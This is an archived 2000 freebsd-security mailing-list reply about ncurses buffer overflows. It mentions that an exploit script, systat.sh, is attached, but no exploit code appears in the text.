Date: Tue, 10 Oct 2000 16:07:37 +0200
From: Przemyslaw Frasunek
To: freebsd-security@freebsd.org
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010160736.N94343@riget.scene.pl>
In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>
References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>

On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> For those of you who don't subscribe to BUGTRAQ, here's a heads up.

And the exploit (in attachment).
-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

[Attachment: systat.sh (application/x-sh)]